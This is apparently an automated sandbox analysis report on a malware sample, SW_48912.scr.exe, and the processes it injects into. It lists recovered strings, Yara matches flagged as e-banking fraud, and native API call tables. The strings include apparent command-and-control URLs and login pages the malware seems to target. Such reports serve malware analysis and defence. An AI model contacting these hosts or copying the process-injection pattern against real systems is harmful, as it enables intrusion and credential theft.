                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: SW_48912.scr.exe, 00000000.00000002.1920984218.0000000002570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: kygSlzwdnMXWUy.exe, 0000000B.00000002.3540931534.000000000549D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz
                Source: kygSlzwdnMXWUy.exe, 0000000B.00000002.3540931534.000000000549D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz/uwne/
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmp, SW_48912.scr.exe, 00000000.00000002.1929676185.0000000004F74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SW_48912.scr.exe, 00000000.00000002.1930838935.00000000066A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000005B72000.00000004.10000000.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003EF2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dejikenkyu.cyou/pmpa/?APatc2S=UeIvIKLKGFys4rt1ZLFH8w433wQ6fCVgMoTtmR20aEJv9MnWadULdaABdMWFle
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sdchange.exe, 0000000A.00000003.2217160682.0000000007870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sdchange.exe, 0000000A.00000002.3539997755.0000000004C8C000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539460184.0000000004403000.00000004.00000020.00020000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000000.2107696949.000000000300C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2330034201.000000003BF4C000.00000004.80000000.00040000.00000000.sdmp, SW_48912.scr.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: sdchange.exe, 0000000A.00000002.3541479484.0000000007898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: sdchange.exe, 0000000A.00000002.3541338963.0000000007570000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.000000000584E000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.0000000005398000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 0000000A.00000002.3539997755.00000000056BC000.00000004.10000000.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003BCE000.00000004.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003A3C000.00000004.00000001.00040000.00000000.sdmp, kygSlzwdnMXWUy.exe, 0000000B.00000002.3539652214.0000000003718000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

                E-Banking Fraud

                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.SW_48912.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2040290934.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539313098.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2039723825.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3538479433.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3540931534.0000000005440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3539365806.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2041411490.00000000018E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3539428414.0000000002BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0042C533 NtClose,5_2_0042C533
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422B60 NtClose,LdrInitializeThunk,5_2_01422B60
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01422DF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01422C70
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014235C0 NtCreateMutant,LdrInitializeThunk,5_2_014235C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01424340 NtSetContextThread,5_2_01424340
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01424650 NtSuspendThread,5_2_01424650
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422BE0 NtQueryValueKey,5_2_01422BE0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422BF0 NtAllocateVirtualMemory,5_2_01422BF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422B80 NtQueryInformationFile,5_2_01422B80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422BA0 NtEnumerateValueKey,5_2_01422BA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422AD0 NtReadFile,5_2_01422AD0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422AF0 NtWriteFile,5_2_01422AF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422AB0 NtWaitForSingleObject,5_2_01422AB0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422D00 NtSetInformationFile,5_2_01422D00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422D10 NtMapViewOfSection,5_2_01422D10
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422D30 NtUnmapViewOfSection,5_2_01422D30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422DD0 NtDelayExecution,5_2_01422DD0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422DB0 NtEnumerateKey,5_2_01422DB0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422C60 NtCreateKey,5_2_01422C60
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422C00 NtQueryInformationProcess,5_2_01422C00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422CC0 NtQueryVirtualMemory,5_2_01422CC0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422CF0 NtOpenProcess,5_2_01422CF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422CA0 NtQueryInformationToken,5_2_01422CA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422F60 NtCreateProcessEx,5_2_01422F60
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422F30 NtCreateSection,5_2_01422F30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422FE0 NtCreateFile,5_2_01422FE0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422F90 NtProtectVirtualMemory,5_2_01422F90
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422FA0 NtQuerySection,5_2_01422FA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422FB0 NtResumeThread,5_2_01422FB0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422E30 NtWriteVirtualMemory,5_2_01422E30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422EE0 NtQueueApcThread,5_2_01422EE0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422E80 NtReadVirtualMemory,5_2_01422E80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01422EA0 NtAdjustPrivilegesToken,5_2_01422EA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01423010 NtOpenDirectoryObject,5_2_01423010
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01423090 NtSetValueKey,5_2_01423090
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014239B0 NtGetContextThread,5_2_014239B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01423D70 NtOpenThread,5_2_01423D70
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01423D10 NtOpenProcessToken,5_2_01423D10
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D4650 NtSuspendThread,LdrInitializeThunk,10_2_046D4650
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D4340 NtSetContextThread,LdrInitializeThunk,10_2_046D4340
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2C60 NtCreateKey,LdrInitializeThunk,10_2_046D2C60
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_046D2C70
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_046D2CA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_046D2D30
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_046D2D10
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_046D2DF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2DD0 NtDelayExecution,LdrInitializeThunk,10_2_046D2DD0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_046D2EE0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_046D2E80
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2F30 NtCreateSection,LdrInitializeThunk,10_2_046D2F30
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2FE0 NtCreateFile,LdrInitializeThunk,10_2_046D2FE0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2FB0 NtResumeThread,LdrInitializeThunk,10_2_046D2FB0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2AF0 NtWriteFile,LdrInitializeThunk,10_2_046D2AF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2AD0 NtReadFile,LdrInitializeThunk,10_2_046D2AD0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2B60 NtClose,LdrInitializeThunk,10_2_046D2B60
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_046D2BE0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_046D2BF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_046D2BA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D35C0 NtCreateMutant,LdrInitializeThunk,10_2_046D35C0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D39B0 NtGetContextThread,LdrInitializeThunk,10_2_046D39B0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2C00 NtQueryInformationProcess,10_2_046D2C00
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2CF0 NtOpenProcess,10_2_046D2CF0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2CC0 NtQueryVirtualMemory,10_2_046D2CC0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2D00 NtSetInformationFile,10_2_046D2D00
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2DB0 NtEnumerateKey,10_2_046D2DB0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2E30 NtWriteVirtualMemory,10_2_046D2E30
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2EA0 NtAdjustPrivilegesToken,10_2_046D2EA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2F60 NtCreateProcessEx,10_2_046D2F60
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2FA0 NtQuerySection,10_2_046D2FA0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2F90 NtProtectVirtualMemory,10_2_046D2F90
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2AB0 NtWaitForSingleObject,10_2_046D2AB0
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D2B80 NtQueryInformationFile,10_2_046D2B80
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D3010 NtOpenDirectoryObject,10_2_046D3010
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D3090 NtSetValueKey,10_2_046D3090
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D3D70 NtOpenThread,10_2_046D3D70
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_046D3D10 NtOpenProcessToken,10_2_046D3D10
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02728F20 NtCreateFile,10_2_02728F20
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02729220 NtClose,10_2_02729220
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02729390 NtAllocateVirtualMemory,10_2_02729390
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02729090 NtReadFile,10_2_02729090
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_02729180 NtDeleteFile,10_2_02729180
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_0239E714 0_2_0239E714
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_0667773C 0_2_0667773C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_0667819A 0_2_0667819A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B8E428 0_2_06B8E428
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B8E860 0_2_06B8E860
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B89788 0_2_06B89788
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06B8DFF0 0_2_06B8DFF0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06F80EB8 0_2_06F80EB8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06F87CA8 0_2_06F87CA8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 0_2_06F809C0 0_2_06F809C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00418513 5_2_00418513
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040E048 5_2_0040E048
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040E053 5_2_0040E053
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00403080 5_2_00403080
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004028B0 5_2_004028B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00401200 5_2_00401200
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0042EB63 5_2_0042EB63
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00402C32 5_2_00402C32
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040FCEC 5_2_0040FCEC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040FCF3 5_2_0040FCF3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040251D 5_2_0040251D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00402520 5_2_00402520
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040DEFA 5_2_0040DEFA
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040DF03 5_2_0040DF03
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0040FF13 5_2_0040FF13
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_00416723 5_2_00416723
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01478158 5_2_01478158
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0100 5_2_013E0100
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148A118 5_2_0148A118
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A81CC 5_2_014A81CC
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B01AA 5_2_014B01AA
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A41A2 5_2_014A41A2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AA352 5_2_014AA352
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B03E6 5_2_014B03E6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE3F0 5_2_013FE3F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490274 5_2_01490274
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014702C0 5_2_014702C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B0591 5_2_014B0591
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A2446 5_2_014A2446
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01494420 5_2_01494420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149E4F6 5_2_0149E4F6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01414750 5_2_01414750
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0770 5_2_013F0770
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EC7C0 5_2_013EC7C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140C6E0 5_2_0140C6E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01406962 5_2_01406962
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F29A0 5_2_013F29A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014BA9A6 5_2_014BA9A6
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FA840 5_2_013FA840
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F2840 5_2_013F2840
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D68B8 5_2_013D68B8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E8F0 5_2_0141E8F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AAB40 5_2_014AAB40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A6BD7 5_2_014A6BD7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EEA80 5_2_013EEA80
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FAD00 5_2_013FAD00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148CD1F 5_2_0148CD1F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EADE0 5_2_013EADE0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01408DBF 5_2_01408DBF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0C00 5_2_013F0C00
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E0CF2 5_2_013E0CF2
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01490CB5 5_2_01490CB5
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01464F405_2_01464F40
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01432F285_2_01432F28
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01410F305_2_01410F30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01492F305_2_01492F30
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146EFA05_2_0146EFA0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E2FC85_2_013E2FC8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0E595_2_013F0E59
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AEE265_2_014AEE26
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AEEDB5_2_014AEEDB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01402E905_2_01402E90
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014ACE935_2_014ACE93
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014BB16B5_2_014BB16B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142516C5_2_0142516C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DF1725_2_013DF172
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FB1B05_2_013FB1B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149F0CC5_2_0149F0CC
